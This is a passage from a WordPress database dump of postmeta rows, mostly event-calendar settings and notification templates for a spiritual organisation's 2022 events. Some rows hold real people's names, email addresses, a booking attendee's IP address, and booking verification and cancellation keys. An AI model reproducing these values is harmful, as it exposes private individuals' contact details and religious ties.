reated_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154806,266298,'_thumbnail_id','265237'),(154807,266299,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/02/ExperienceHu2.webp - cannot be optimized, it has an invalid file type'),(154808,266299,'smush-complete',''),(154809,266301,'_field_133','karin'),(154810,266301,'_field_134','garcia'),(154811,266301,'_field_135','karingarcia423@gmail.com'),(154812,266301,'_field_137','question'),(154813,266301,'_field_138','can i send you a prayer request'),(154814,266301,'_form_id','13'),(154815,266301,'_seq_num','98'),(154816,266302,'_field_224','Elizabeth'),(154817,266302,'_field_225','Brandes'),(154818,266302,'_field_226','elizabethstar1@yahoo.com'),(154819,266302,'_field_227','CO'),(154820,266302,'_field_228','US'),(154821,266302,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(154822,266302,'_form_id','21'),(154823,266302,'_seq_num','145'),(161311,266657,'mec_in_days',''),(161310,266657,'mec_advanced_days','a:0:{}'),(161309,266657,'mec_repeat_end_at_date',''),(161308,266657,'mec_repeat_end_at_occurrences',''),(161307,266657,'mec_repeat_end',''),(161306,266657,'mec_repeat_interval','1'),(161305,266657,'mec_repeat_type',''),(161304,266657,'mec_repeat_status','0'),(161303,266657,'mec_end_day_seconds','72000'),(161296,266657,'mec_start_time_minutes','0'),(161297,266657,'mec_start_time_ampm','PM'),(161298,266657,'mec_start_day_seconds','68400'),(161299,266657,'mec_end_date','2022-05-17'),(161300,266657,'mec_end_time_hour','8'),(161301,266657,'mec_end_time_minutes','0'),(161302,266657,'mec_end_time_ampm','PM'),(161293,266657,'mec_public','1'),(161294,266657,'mec_start_date','2022-05-17'),(161295,266657,'mec_start_time_hour','7'),(161292,266657,'mec_countdown_method','global'),(161291,266657,'mec_timezone','global'),(161290,266657,'mec_comment',''),(161289,266657,'mec_hide_end_time','0'),(161288,266657,'mec_hide_time','0'),(161287,266657,'one_occurrence','0'),(161286,266657,'mec_allday','0'),(161285,266657,'mec_certain_weekdays','a:0:{}'),(161284,266657,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(161283,266657,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-17\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-17\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(161282,266657,'mec_additional_location_ids','a:0:{}'),(161281,266657,'mec_additional_organizer_ids','a:0:{}'),(161280,266657,'mec_currency','a:0:{}'),(161279,266657,'mec_cost',''),(161278,266657,'mec_more_info_target','_self'),(161277,266657,'mec_more_info_title',''),(161276,266657,'mec_more_info',''),(161275,266657,'mec_read_more',''),(161274,266657,'mec_organizer_id','1'),(161273,266657,'mec_dont_show_map','0'),(161272,266657,'mec_location_id','118'),(161271,266657,'mec_color',''),(161255,266655,'mec_date','1652005800:1652052600'),(161256,266655,'mec_ticket_id',',1,'),(161257,266655,'mec_booking_time','2022-05-07 21:21:30'),(161258,266655,'mec_all_dates','a:0:{}'),(161259,266655,'mec_other_dates','a:0:{}'),(161260,266655,'mec_attention_time','1652005800:1652052600'),(161261,266655,'mec_attention_time_start','1652005800'),(161262,266655,'mec_attention_time_end','1652052600'),(161263,266655,'mec_book_date_submit','20220507212130'),(161264,266655,'mec_booking_location','129'),(161265,266655,'mec_ticket_price_1','0'),(161266,266655,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"75.70.193.184\";}}'),(161267,266655,'mec_price','0'),(161268,266655,'mec_gateway','MEC_gateway_free'),(161269,266655,'mec_gateway_label','Free'),(161270,266657,'protect_children',''),(161254,266655,'mec_event_id','266568'),(161253,266655,'mec_confirmed','1'),(161252,266655,'mec_cancellation_key','83860482f397e5ac5cf990fb285c6ab1'),(161251,266655,'mec_verification_key','3c0e6c116c049b3276de9fd33fdf2e8d'),(161250,266655,'mec_verified','1'),(161249,266655,'mec_user_id','1000006'),(155179,266315,'_edit_last','2'),(154895,266307,'_field_425','Test'),(154896,266307,'_field_426','Testing'),(154897,266307,'_field_427','choll.03@comcast.net'),(154898,266307,'_form_id','46'),(154899,266307,'_seq_num','39'),(154900,266308,'protect_children',''),(154901,266308,'mec_color',''),(154902,266308,'mec_location_id','118'),(154903,266308,'mec_dont_show_map','0'),(154904,266308,'mec_organizer_id','1'),(154905,266308,'mec_read_more',''),(154906,266308,'mec_more_info',''),(154907,266308,'mec_more_info_title',''),(154908,266308,'mec_more_info_target','_self'),(154909,266308,'mec_cost',''),(154910,266308,'mec_currency','a:0:{}'),(154911,266308,'mec_additional_organizer_ids','a:0:{}'),(154912,266308,'mec_additional_location_ids','a:0:{}'),(154913,266308,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-20\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-20\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(154914,266308,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(154915,266308,'mec_certain_weekdays','a:0:{}'),(154916,266308,'mec_allday','0'),(154917,266308,'one_occurrence','0'),(154918,266308,'mec_hide_time','0'),(154919,266308,'mec_hide_end_time','0'),(154920,266308,'mec_comment',''),(154921,266308,'mec_timezone','global'),(154922,266308,'mec_countdown_method','global'),(154923,266308,'mec_public','1'),(154924,266308,'mec_start_date','2022-03-20'),(154925,266308,'mec_start_time_hour','10'),(154926,266308,'mec_start_time_minutes','30'),(154927,266308,'mec_start_time_ampm','AM'),(154928,266308,'mec_start_day_seconds','37800'),(154929,266308,'mec_end_date','2022-03-20'),(154930,266308,'mec_end_time_hour','11'),(154931,266308,'mec_end_time_minutes','30'),(154932,266308,'mec_end_time_ampm','AM'),(154933,266308,'mec_end_day_seconds','41400'),(154934,266308,'mec_repeat_status','0'),(154935,266308,'mec_repeat_type',''),(154936,266308,'mec_repeat_interval','1'),(154937,266308,'mec_repeat_end',''),(154938,266308,'mec_repeat_end_at_occurrences',''),(154939,266308,'mec_repeat_end_at_date',''),(154940,266308,'mec_advanced_days','a:0:{}'),(154941,266308,'mec_in_days',''),(154942,266308,'mec_not_in_days',''),(154943,266308,'mec_hourly_schedules','a:0:{}'),(154944,266308,'mec_booking','a:0:{}'),(154945,266308,'mec_tickets','a:0:{}'),(154946,266308,'mec_fees_global_inheritance','1'),(154947,266308,'mec_fees','a:0:{}'),(154948,266308,'mec_ticket_variations_global_inheritance','1'),(154949,266308,'mec_ticket_variations','a:0:{}'),(154950,266308,'mec_reg_fields_global_inheritance','1'),(154951,266308,'mec_reg_fields','a:0:{}'),(154952,266308,'mec_bfixed_fields','a:0:{}'),(154953,266308,'mec_op','a:0:{}'),(154954,266308,'mec_fields','a:0:{}'),(154955,266308,'mec_event_status','EventScheduled'),(154956,266308,'mec_moved_online_link',''),(154957,266308,'mec_cancelled_reason',''),(154958,266308,'mec_display_cancellation_reason_in_single_page',''),(154959,266308,'boldgrid_hide_page_title','0'),(154960,266308,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(154961,266308,'passster_activate_global_protection',NULL),(154962,266308,'passster_activate_protection',NULL),(154963,266308,'passster_protection_type','password'),(154965,266308,'_dp_original','266104'),(154966,266308,'_edit_lock','1654359240:2'),(154967,266308,'_edit_last','2'),(154968,266308,'_thumbnail_id','266063'),(154969,266310,'protect_children',''),(154970,266310,'_field_511','Testing'),(154971,266310,'_field_512','test'),(154972,266310,'_field_513','choll.03@comcast.net'),(154973,266310,'_form_id','54'),(154974,266310,'_seq_num','1'),(154975,266311,'mec_color',''),(154976,266311,'mec_location_id','122'),(154977,266311,'mec_dont_show_map','0'),(154978,266311,'mec_organizer_id','1'),(154979,266311,'mec_read_more',''),(154980,266311,'mec_more_info',''),(154981,266311,'mec_more_info_title',''),(154982,266311,'mec_more_info_target','_self'),(154983,266311,'mec_cost',''),(154984,266311,'mec_currency','a:0:{}'),(154985,266311,'mec_additional_organizer_ids','a:0:{}'),(154986,266311,'mec_additional_location_ids','a:0:{}'),(154987,266311,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-23\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-23\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(154988,266311,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(154989,266311,'mec_certain_weekdays','a:0:{}'),(154990,266311,'mec_allday','0'),(154991,266311,'one_occurrence','0'),(154992,266311,'mec_hide_time','0'),(154993,266311,'mec_hide_end_time','0'),(154994,266311,'mec_comment',''),(154995,266311,'mec_timezone','global'),(154996,266311,'mec_countdown_method','global'),(154997,266311,'mec_public','1'),(154998,266311,'mec_start_date','2022-01-23'),(154999,266311,'mec_start_time_hour','10'),(155000,266311,'mec_start_time_minutes','30'),(155001,266311,'mec_start_time_ampm','AM'),(155002,266311,'mec_start_day_seconds','37800'),(155003,266311,'mec_end_date','2022-01-23'),(155004,266311,'mec_end_time_hour','11'),(155005,266311,'mec_end_time_minutes','30'),(155006,266311,'mec_end_time_ampm','AM'),(155007,266311,'mec_end_day_seconds','41400'),(155008,266311,'mec_repeat_status','0'),(155009,266311,'mec_repeat_type',''),(155010,266311,'mec_repeat_interval','1'),(155011,266311,'mec_repeat_end',''),(155012,266311,'mec_repeat_end_at_occurrences',''),(155013,266311,'mec_repeat_end_at_date',''),(155014,266311,'mec_advanced_days','a:0:{}'),(155015,266311,'mec_in_days',''),(155016,266311,'mec_not_in_days',''),(155017,266311,'mec_hourly_schedules','a:0:{}'),(155018,266311,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(155019,266311,'mec_tickets','a:0:{}'),(155020,266311,'mec_fees_global_inheritance','1'),(155021,266311,'mec_fees','a:0:{}'),(155022,266311,'mec_ticket_variations_global_inheritance','1'),(155023,266311,'mec_ticket_variations','a:0:{}'),(155024,266311,'mec_reg_fields_global_inheritance','1'),(155025,266311,'mec_reg_fields','a:0:{}'),(155026,266311,'mec_bfixed_fields','a:0:{}'),(155027,266311,'mec_op','a:0:{}'),(155028,266311,'mec_fields','a:0:{}'),(155029,266311,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(159659,266311,'boldgrid_in_page_containers','1'),(155030,266311,'mec_event_status','EventScheduled'),(155031,266311,'mec_moved_online_link',''),(155032,266311,'mec_cancelled_reason',''),(155033,266311,'mec_display_cancellation_reason_in_single_page',''),(155034,266311,'protect_children',''),(155035,266311,'passster_activate_global_protection',NULL),(155036,266311,'passster_activate_protection',NULL),(155037,266311,'passster_protection_type','password'),(155038,266311,'boldgrid_hide_page_title','0'),(155039,266311,'_thumbnail_id','265138'),(155041,266311,'_dp_original','266041'),(155042,266311,'_edit_lock','1693507359:2'),(155043,266312,'mec_color',''),(155044,266312,'mec_location_id','122'),(155045,266312,'mec_dont_show_map','0'),(155046,266312,'mec_organizer_id','1'),(155047,266312,'mec_read_more',''),(155048,266312,'mec_more_info',''),(155049,266312,'mec_more_info_title',''),(155050,266312,'mec_more_info_target','_self'),(155051,266312,'mec_cost',''),(155052,266312,'mec_currency','a:0:{}'),(155053,266312,'mec_additional_organizer_ids','a:0:{}'),(155054,266312,'mec_additional_location_ids','a:0:{}'),(155055,266312,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-27\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-27\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(155056,266312,'mec_repeat','a:6:{s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(155057,266312,'mec_certain_weekdays','a:0:{}'),(155058,266312,'mec_allday','0'),(155059,266312,'one_occurrence','0'),(155060,266312,'mec_hide_time','0'),(155061,266312,'mec_hide_end_time','0'),(155062,266312,'mec_comment',''),(155063,266312,'mec_timezone','global'),(155064,266312,'mec_countdown_method','global'),(155065,266312,'mec_public','1'),(155066,266312,'mec_start_date','2022-03-27'),(155067,266312,'mec_start_time_hour','10'),(155068,266312,'mec_start_time_minutes','30'),(155069,266312,'mec_start_time_ampm','AM'),(155070,266312,'mec_start_day_seconds','37800'),(155071,266312,'mec_end_date','2022-03-27'),(155072,266312,'mec_end_time_hour','11'),(155073,266312,'mec_end_time_minutes','30'),(155074,266312,'mec_end_time_ampm','AM'),(155075,266312,'mec_end_day_seconds','41400'),(155076,266312,'mec_repeat_status','0'),(155077,266312,'mec_repeat_type',''),(155078,266312,'mec_repeat_interval','1'),(155079,266312,'mec_repeat_end',''),(155080,266312,'mec_repeat_end_at_occurrences',''),(155081,266312,'mec_repeat_end_at_date',''),(155082,266312,'mec_advanced_days','a:0:{}'),(155083,266312,'mec_in_days',''),(155084,266312,'mec_not_in_days',''),(155085,266312,'mec_hourly_schedules','a:0:{}'),(155086,266312,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(155087,266312,'mec_tickets','a:0:{}'),(155088,266312,'mec_fees_global_inheritance','1'),(155089,266312,'mec_fees','a:0:{}'),(155090,266312,'mec_ticket_variations_global_inheritance','1'),(155091,266312,'mec_ticket_variations','a:0:{}'),(155092,266312,'mec_reg_fields_global_inheritance','1'),(155093,266312,'mec_reg_fields','a:0:{}'),(155094,266312,'mec_bfixed_fields','a:0:{}'),(155095,266312,'mec_op','a:0:{}'),(155096,266312,'mec_fields','a:0:{}'),(155097,266312,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(156658,266405,'mec_dont_show_map','0'),(156659,266405,'mec_organizer_id','1'),(156660,266405,'mec_read_more',''),(156661,266405,'mec_more_info',''),(156662,266405,'mec_more_info_title',''),(156663,266405,'mec_more_info_target','_self'),(156664,266405,'mec_cost',''),(155098,266312,'mec_event_status','EventScheduled'),(155099,266312,'mec_moved_online_link',''),(155100,266312,'mec_cancelled_reason',''),(155101,266312,'mec_display_cancellation_reason_in_single_page',''),(155102,266312,'protect_children',''),(155103,266312,'passster_activate_global_protection',NULL),(155104,266312,'passster_activate_protection',NULL),(155105,266312,'passster_protection_type','password'),(155106,266312,'boldgrid_hide_page_title','0'),(155107,266312,'_thumbnail_id','265137'),(155109,266312,'_dp_original','266041'),(155110,266312,'_edit_lock','1648068927:2'),(155111,266312,'_edit_last','2'),(155113,266315,'protect_children',''),(155112,266315,'protect_children',''),(155115,266315,'mec_location_id','118'),(155114,266315,'mec_color',''),(155116,266315,'mec_dont_show_map','0'),(155117,266315,'mec_organizer_id','1'),(155118,266315,'mec_read_more',''),(155119,266315,'mec_more_info',''),(155120,266315,'mec_more_info_title',''),(155121,266315,'mec_more_info_target','_self'),(155122,266315,'mec_cost',''),(155123,266315,'mec_currency','a:0:{}'),(155124,266315,'mec_additional_organizer_ids','a:0:{}'),(155125,266315,'mec_additional_location_ids','a:0:{}'),(155126,266315,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-15\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-15\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(155127,266315,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(155128,266315,'mec_certain_weekdays','a:0:{}'),(155129,266315,'mec_allday','0'),(155130,266315,'one_occurrence','0'),(155131,266315,'mec_hide_time','0'),(155132,266315,'mec_hide_end_time','0'),(155133,266315,'mec_comment',''),(155134,266315,'mec_timezone','global'),(155135,266315,'mec_countdown_method','global'),(155136,266315,'mec_public','1'),(155137,266315,'mec_start_date','2022-03-15'),(155138,266315,'mec_start_time_hour','7'),(155139,266315,'mec_start_time_minutes','0'),(155140,266315,'mec_start_time_ampm','PM'),(155141,266315,'mec_start_day_seconds','68400'),(155142,266315,'mec_end_date','2022-03-15'),(155143,266315,'mec_end_time_hour','8'),(155144,266315,'mec_end_time_minutes','0'),(155145,266315,'mec_end_time_ampm','PM'),(155146,266315,'mec_end_day_seconds','72000'),(155147,266315,'mec_repeat_status','1'),(155148,266315,'mec_repeat_type','advanced'),(155149,266315,'mec_repeat_interval','1'),(155150,266315,'mec_repeat_end','occurrences'),(155151,266315,'mec_repeat_end_at_occurrences','11'),(155152,266315,'mec_repeat_end_at_date',''),(155153,266315,'mec_advanced_days','a:1:{i:0;s:5:\"Tue.3\";}'),(155154,266315,'mec_in_days',''),(155155,266315,'mec_not_in_days',''),(155156,266315,'mec_hourly_schedules','a:0:{}'),(155157,266315,'mec_booking','a:0:{}'),(155158,266315,'mec_tickets','a:0:{}'),(155159,266315,'mec_fees_global_inheritance','1'),(155160,266315,'mec_fees','a:0:{}'),(155161,266315,'mec_ticket_variations_global_inheritance','1'),(155162,266315,'mec_ticket_variations','a:0:{}'),(155163,266315,'mec_reg_fields_global_inheritance','1'),(155164,266315,'mec_reg_fields','a:0:{}'),(155165,266315,'mec_bfixed_fields','a:0:{}'),(155166,266315,'mec_op','a:0:{}'),(155167,266315,'mec_fields','a:0:{}'),(155168,266315,'mec_event_status','EventScheduled'),(155169,266315,'mec_moved_online_link',''),(155170,266315,'mec_cancelled_reason',''),(155171,266315,'mec_display_cancellation_reason_in_single_page',''),(155172,266315,'boldgrid_hide_page_title','0'),(155173,266315,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(155174,266315,'passster_activate_global_protection',NULL),(155175,266315,'passster_activate_protection',NULL),(155176,266315,'passster_protection_type','password'),(155177,266315,'_dp_original','265916'),(155178,266315,'_edit_lock','1646241696:2'),(155180,266316,'protect_children',''),(155181,266316,'mec_color',''),(155182,266316,'mec_location_id','118'),(155183,266316,'mec_dont_show_map','0'),(155184,266316,'mec_organizer_id','1'),(155185,266316,'mec_read_more',''),(155186,266316,'mec_more_info',''),(155187,266316,'mec_more_info_title',''),(155188,266316,'mec_more_info_target','_self'),(155189,266316,'mec_cost',''),(155190,266316,'mec_currency','a:0:{}'),(155191,266316,'mec_additional_organizer_ids','a:0:{}'),(155192,266316,'mec_additional_location_ids','a:0:{}'),(155193,266316,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-20\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-20\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(155194,266316,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(155195,266316,'mec_certain_weekdays','a:0:{}'),(155196,266316,'mec_allday','0'),(155197,266316,'one_occurrence','0'),(155198,266316,'mec_hide_time','0'),(155199,266316,'mec_hide_end_time','0'),(155200,266316,'mec_comment',''),(155201,266316,'mec_timezone','global'),(155202,266316,